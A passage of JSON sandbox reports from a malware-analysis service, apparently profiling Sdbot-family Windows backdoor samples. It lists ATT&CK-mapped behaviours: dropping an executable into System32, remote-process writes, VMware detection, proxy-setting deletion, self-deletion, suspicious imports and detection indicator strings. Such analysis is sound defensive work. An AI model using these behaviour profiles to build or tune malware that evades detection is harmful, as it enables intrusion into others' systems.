\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-188", "relevance": 5, "name": "Calls APIs used for Remove Service", "description": "Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16]\n Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: dlldsk32.exe]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"cmd.exe\" marked \"C:\\0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "Remote Access Related", "identifier": "string-579", "type": 2, "relevance": 1, "name": "Contains ability to retrieve remote user information", "description": "Observed string: \"FINGER %s\" (Indicator: \"finger \") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n Observed string: \"Go finger yourself\" (Indicator: \" finger \") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n Observed string: \"Get you finger out of there\" (Indicator: \" finger \") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n Observed string: \"Stick your finger somewhere else\" (Indicator: \" finger \") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n Observed string: \"FINGER\" (Indicator: \"finger\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n Observed string: \"FINGER %s\" (Indicator: \"finger \") in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n Observed string: \"Go finger yourself\" (Indicator: \" finger \") in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n Observed string: \"Get you finger out of there\" (Indicator: \" finger \") in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n Observed string: \"Stick your finger somewhere else\" (Indicator: \" finger \") in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n Observed string: \"FINGER\" (Indicator: \"finger\") in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" reads file \"C:\\Users\\%OSUSER%\\Searches\\desktop.ini\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" reads file \"C:\\Users\\%OSUSER%\\Videos\\desktop.ini\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" reads file \"C:\\Users\\%OSUSER%\\Pictures\\desktop.ini\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" reads file \"C:\\Users\\%OSUSER%\\Contacts\\desktop.ini\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" reads file \"C:\\Users\\%OSUSER%\\Favorites\\desktop.ini\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" reads file \"C:\\Users\\%OSUSER%\\Music\\desktop.ini\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" reads file \"C:\\Users\\%OSUSER%\\Downloads\\desktop.ini\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-3", "relevance": 10, "name": "Timestamp in PE header is very old or in the future", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\" claims program is from Thu Jan 1 15:30:08 1970\n \"dlldsk32.exe\" claims program is from Thu Jan 1 15:30:08 1970", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\" claimed CRC 325214 while the actual is CRC 723622\n \"dlldsk32.exe\" claimed CRC 325214 while the actual is CRC 739610", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\" has an entrypoint in section \"UPX0\"\n \"dlldsk32.exe\" has an entrypoint in section \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "RegDeleteKeyA\n RegCloseKey\n OpenProcessToken\n GetUserNameA\n RegOpenKeyExA\n RegDeleteValueA\n RegCreateKeyExA\n LoadLibraryA\n GetFileAttributesA\n CopyFileA\n GetVersionExA\n GetModuleFileNameA\n GetSystemDirectoryA\n GetFileSize\n OpenProcess\n DeleteFileA\n UnhandledExceptionFilter\n TerminateProcess\n GetCommandLineA\n GetProcAddress\n GetTempPathA\n CreateThread\n GetModuleHandleA\n FindFirstFileA\n GetStartupInfoA\n GetComputerNameA\n FindNextFileA\n ExitThread\n CreateProcessA\n WriteFile\n Sleep\n CreateFileA\n GetTickCount\n VirtualAlloc\n ShellExecuteA\n GetClipboardData\n HttpSendRequestA\n InternetOpenUrlA\n InternetReadFile\n InternetCloseHandle\n InternetOpenA\n InternetConnectA\n InternetCrackUrlA\n WSASocketA\n accept\n WSAStartup\n connect\n closesocket\n send\n listen\n recv\n socket\n bind\n sendto", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"dlldsk32.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\dlldsk32.exe]- [targetUID: 00000000-00004816]\n \"DLLDSK32.EXE.67A9C384.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\" has section name UPX0 with entropy \"6.33637327379\"\n \"dlldsk32.exe\" has section name UPX0 with entropy \"6.33637327379\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "string-126", "type": 2, "relevance": 3, "name": "Found system commands related strings", "description": "Found string \"Netstat error: Unable to create batch file\" (Indicator: \"netstat\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"Ping timeout\" (Indicator: \"ping\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"No route to host\" (Indicator: \"route\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"Netstat error: No results found\" (Indicator: \"netstat\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"Netstat error: Unable to open netstat piped file\" (Indicator: \"netstat\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"Netstat error: Unable to execute batch file\" (Indicator: \"netstat\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"Netstat error: Unable to copy netstat\" (Indicator: \"netstat\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"netstat\" (Indicator: \"netstat\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"ping.exe\" (Indicator: \"ping.exe\"; Source: \"00000000-00004816.00000000.139125.001D0000.00000004.mdmp\")\n Found string \"Netstat error: Unable to create batch file\" (Indicator: \"netstat\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")\n Found string \"Ping timeout\" (Indicator: \"ping\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")\n Found string \"No route to host\" (Indicator: \"route\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")\n Found string \"Netstat error: No results found\" (Indicator: \"netstat\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")\n Found string \"Netstat error: Unable to open netstat piped file\" (Indicator: \"netstat\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")\n Found string \"Netstat error: Unable to execute batch file\" (Indicator: \"netstat\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")\n Found string \"Netstat error: Unable to copy netstat\" (Indicator: \"netstat\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")\n Found string \"netstat\" (Indicator: \"netstat\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")\n Found string \"PING\" (Indicator: \"ping\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "string-93", "type": 2, "relevance": 5, "name": "Found browser information locations related strings", "description": "\"Software\\Microsoft\\Internet Explorer\\TypedURLs\" (Indicator: \"microsoft\\internet explorer\\typedurls\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16", "origin": "File/Memory", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "target-423", "type": 9, "relevance": 5, "name": "Tries to access/write temporary files", "description": "Process \"%WINDIR%\\system32\\cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2767.bat\" \"\" (UID: 00000000-00005084)", "origin": "Monitored Target", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00004816)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\r2767.bat (UID: 00000000-00004816)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\dlldsk32.exe\" (Handle: 468)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\dlldsk32.exe\" (Handle: 468)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\dlldsk32.exe\" (Handle: 468)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "binary-7", "type": 8, "relevance": 7, "name": "Drops executable files to the Windows system directory", "description": "File type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\" was dropped at \"%WINDIR%\\System32\\dlldsk32.exe\"", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Environment Awareness", "identifier": "registry-56", "type": 3, "relevance": 5, "name": "Reads the registry for VMWare specific artifacts", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Path: \"HKLM\\SOFTWARE\\VMWARE, INC.\\VMWARE TOOLS\")\n \"dlldsk32.exe\" (Path: \"HKLM\\SOFTWARE\\VMWARE, INC.\\VMWARE TOOLS\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "string-43", "type": 2, "relevance": 7, "name": "References security related windows services", "description": "\"wuauserv\" (Indicator: \"wuauserv\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"SYSTEM\\CurrentControlSet\\Services\\wscsvc\" (Indicator: \"wscsvc\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16", "origin": "File/Memory", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d
https://hybrid-analysis.com/sample/8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d
Hybrid Analysis - Killers
{"size": 685880, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "submit_name": "8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d", "sha256": "8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d", "av_detect": 87, "vx_family": "Sdbot.Generic", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 172, "processes": [{"uid": "00000000-00005224", "name": "8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe", "normalized_path": "C:\\8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe", "sha256": "8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 5, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", 